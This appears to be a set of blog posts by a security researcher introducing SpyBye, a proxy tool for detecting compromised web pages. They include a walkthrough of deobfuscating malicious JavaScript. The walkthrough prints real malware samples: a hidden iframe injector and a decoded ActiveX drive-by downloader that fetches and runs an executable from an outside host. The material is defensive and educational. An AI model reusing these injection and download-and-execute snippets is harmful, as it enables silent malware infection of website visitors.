Niels Provos

Exploits are often obfuscated to make it more difficult to detect nefarious activities. The reason that SpyBye is posing as a proxy server is to get your web browser to do all the decoding for us. This is not only restricted to javascript, but also applies to any other scripting languages or media decoders your browser might support, Visual Basic script, Windows Media Player, etc. Your browser is good at that, but we are not. However, when we suspect an exploit, we sometimes still need to manually investigate and deobfuscate. Take the following javascript as example:


<script language="JavaScript">e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7 %BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1 %F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF %C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";
str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}
document.write(str);</script>


We see that there is a quoted string and some javascript after it to decrypt it. Go over to the Web Development Bookmarklets and install jsenv as a bookmarklet. Click on the jsenv link to open up a window running the JavaScript Development Environment. Now, cut and paste the javascript from above - I introduced artificial line breaks, remove those. We also need to remove the HTML tags and replace document.write with print. The result should look like this:


e = '0x00' + '5F';str1 = "%E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD%B7%BE%B7%B4%B7%AC%A7%E6%B8%B7 %BC%BC%BB%B2%FE%E2%E4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0%E6%F1 %F1%B0%AE%BF%BC%B1%E9%F2%BD%B1%B3%F1%AC%AE%BA%F1%FE%C0%A9%B7%BC%AC%B8%E3%EF %C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF%B3%BB%E2%E4%F1%BC%B7%AA%E2";
str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}print(str);


Now press the execute button and see what happens:

Running in bookmarklet mode...
<div style="visibility:hidden"><iframe src="http://prado7.com/trf/" width=1 height=1></iframe></div>


The iframe instructs your browser to download a plethora of exploits. Obviously, this was just a simple example. In other cases, we see double or triple wrapped javascript that results in Visual Basic script to download an executable. Or we observe an exploit against WMF to causes a malware binary to be downloaded. That is very hard for us to simulate ourselves, that's why SpyBye uses your browser to do all the work.

Here is a typical example of a compromised web page. Due to a bug in a web application like phpBB2, Moveable Type or many others, the adversary was able to insert the following line of HTML into your home page:

<iframe src="http://www.somehost.com/ment/" width="0" height="0"></iframe>

When visiting your home page, the single line of HTML causes your web browser to load additional content from an external web server. When looking at the content behind www.somehost.com/ment/, we find something incomprehensible to us. It's a block of javascript that consists only of numbers. Just by looking at it, we have no idea what the code might do:

<script>
t="60,115,99,114,105,112,116,32,108,97,110,103,118,97,103,
101,61,106,97,118,97,115,99,114,105,112,116,62,13,
10,118,97,114,32,117,114,108,44,112,97,116,104,44,118,97,114,49,44,118,97,
114,50,44,118,97,
[many more lines of numbers]
t=eval("String.fromCharCode("+t+")");
document.write(t);</script>

However, it's pretty straight forward to decipher this if you have bookmarked javascript shell - just search for it. When using jshell to evaluate the javascript from above, it decodes to the following:

<script language=javascript> var url,path,var1,var2,var3,var4;
url="http://www.somehost.com/ment/bad.exe";
path="C:\\windows\\IsUno104.exe"; var1="Microsoft.xmlhttp";
var2="Adodb.Stream"; var3="Shell.Application";
var var4_1="clsid:BD96C556-65A"; var var4_2="3-11D0-983A-00C04FC29E36";
var4=var4_1+var4_2;
try{var ado=(document.createElement("object"));
ado.setAttribute("classid",var4); var xml=ado.CreateObject(var1,"");
var as=ado.createobject(var2,""); xml.Open("GET",url,0); xml.Send();
as.type=1;as.open();as.write(xml.responseBody); 
as.savetofile(path,2);as.close();var shell=ado.createobject(var3,"");
shell.Shell(path,"","","open",0);}catch(e){};
</script>

This resulting javascript uses XMLRPC to download a binary from the Internet. It saves it on your local hard drive and then uses an ActiveX object to execute it. According to ClamAV, the executable is a Trojan-Downloader. This means that it is an application that can download an arbitrary number of other executables on your computer that can then happily sniff your passwords, compromise your bank accounts, display popups or use your computer to send spam.

All of this with just a single line of HTML. Amazing? Right!

The actual example had some more indirections and also threw in some additional visual basic script plus some other goodies that would have complicated our explanation.

The simplest way to get exposure to SpyBye is to configure your browser to use http://www.spybye.org:8080/ as proxy. However, this is likely to be slow as your are sharing the proxy with other users and are constrained by the limited bandwidth in my closet. You can now download the SpyBye software yourself from http://www.monkey.org/~provos/spybye/ and run it on your own servers.

For detailed installation instructions, please consult the following article. Hopefully, there is enough information there, to get you up and running in a matter of minutes.

Happy Hunting.

Niels.

SpyBye is a tool to help web masters determine if their web pages are hosting browser exploits that can infect visiting users with malware. It functions as an HTTP proxy server and intercepts all browser requests. SpyBye uses a few simple rules to determine if embedded links on your web page are harmlesss, unknown or maybe even dangerous.

To try SpyBye, configure your browser to use www.spybye.org:8080 as proxy server and then go visit http://spybye.org/.

How does SpyBye work? SpyBye operates as a proxy server and gets to see all the web fetches that your browser makes. It applies very simple rules to each URL that is fetched as a result of loading a web page. These rules allows us to classify a URL into three categories: harmless, unknown or dangerous. Although, there is great margin of error, the categories allow a web master to look at the URLs and determine if they should be there or not. If you see that a URL is being fetched that you would not expect, it's a good indication you have been copromised.

Why did you write SpyBye? It has become increasingly common for web sites to get compromised. This can happen either due to vulnerable web applications that you run or due to compromised servers via vectors completely out of your control. Nonetheless, it is important for web masters to be able to tell if their pages are dangerous to their users. SpyBye provides a very simple mechanism to determine how a site works on the HTTP level. This often gives us clues about potentially dangerous content. I hope that SpyBye can be of use to anyone who wants to verify if their web site could be compromised and dangerous. The unoffical explanation is that I needed some code to test libevent's HTTP layer; writing a proxy exercises most of the code paths.

In a couple of days, SpyBye is going to be released as Open Source package, so that you can run your own proxy and check your pages.

Disclaimer SpyBye does not protect you from getting exploited yourself. It tries to take reasonable precautions to avoid infection while using it. However, ideally, you would run your browser in a virtual machine and revert to a clean snapshot when done. You have been warned. Today's malware is capable of rendering your computer unusable - and empty your bank accounts!

Chris Evans from Google Security discovered an integer overflow in the Systrace kernel code. If an adversary can open "/dev/systrace", the bug can be leveraged to gain root access. Both OpenBSD and NetBSD current have been patched. Please, update your systems.

I was going to do some late night hacking but then I found this. My first game. I wrote this in 1989 for the Amiga. I feared that this great work(!) might have been forever lost but I just found a copy of it on some warez server. The games comes with a level editor. I was esp. proud of the level editor because I used run-length encoding to compress the levels. The editor supported up to 1,000.